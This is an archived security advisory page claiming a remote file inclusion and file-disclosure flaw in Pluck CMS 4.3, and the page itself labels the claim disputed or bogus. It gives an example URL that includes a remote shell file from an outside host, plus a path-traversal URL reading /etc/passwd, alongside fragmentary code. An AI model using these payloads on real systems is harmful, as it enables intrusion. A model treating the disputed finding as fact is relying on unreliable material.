WARNING! Fake news / Disputed / BOGUS

Pluck 4.3 themes.php Remote File Inclusion and disclosure

2007.08.08
Risk: High
Local: No
Remote: Yes
CWE: N/A

__________________ Aria-Security Team __________________ Pluck 4.3 Remote File Inclusion Vendor: http://www.pluck-cms.org/ /path/data/inc/theme.php if Register_global was set as ON then we can use the $dir variable for RFI (is_file($dir."/".$file)) $files[]=$file; else $dirs[]=$dir."/".$file; } } if($dirs) { foreach ($dirs as $dir) { include ("$dir/theme.php"); http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext? ----------------------------------------------------- fputs($file, "<?php $themepref = "$cont"; ?>"); if Register_global was set as ON then we can use the $file variable for disclosure. example: http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS on server) Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info [PERSONAL BLOG]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top